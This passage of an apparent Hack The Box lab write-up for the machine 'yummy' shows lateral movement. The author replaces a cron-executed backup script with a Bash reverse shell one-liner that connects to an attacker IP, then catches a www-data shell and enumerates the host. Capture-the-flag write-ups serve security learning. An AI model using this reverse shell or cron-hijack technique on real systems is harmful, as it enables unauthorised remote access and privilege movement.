www-data
mysql@yummy:/var/tmp$ mv /data/scripts/app_backup.sh /data/scripts/app_backup.sh.goneI will first change the name of the original app_backup.sh file, so it doesn’t get executed by cronjob
mysql@yummy:/var/tmp$ echo 'bash -i >& /dev/tcp/10.10.15.34/8888 0>&1' > shell.shThen, I will create a simple Bash reverse shell file; /var/tmp/shell.sh
mysql@yummy:/var/tmp$ mv /var/tmp/shell.sh /data/scripts/app_backup.sh
mv: replace '/data/scripts/app_backup.sh', overriding mode 0644 (rw-r--r--)? y
yOverwriting the app_backup.sh file with the Bash reverse shell
mysql@yummy:/var/tmp$ cat /data/scripts/app_backup.sh
bash -i >& /dev/tcp/10.10.15.34/8888 0>&1Confirmed
┌──(kali㉿kali)-[~/archive/htb/labs/yummy]
└─$ nnc 8888
listening on [any] 8888 ...
connect to [10.10.15.34] from (UNKNOWN) [10.129.231.153] 34320
bash: cannot set terminal process group (26742): Inappropriate ioctl for device
bash: no job control in this shell
www-data@yummy:~$ whoami
whoami
www-data
www-data@yummy:~$ hostname
hostname
yummy
www-data@yummy:~$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:da:d3 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.231.153/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2294sec preferred_lft 2294secLateral Movement made to the www-data by file overwrite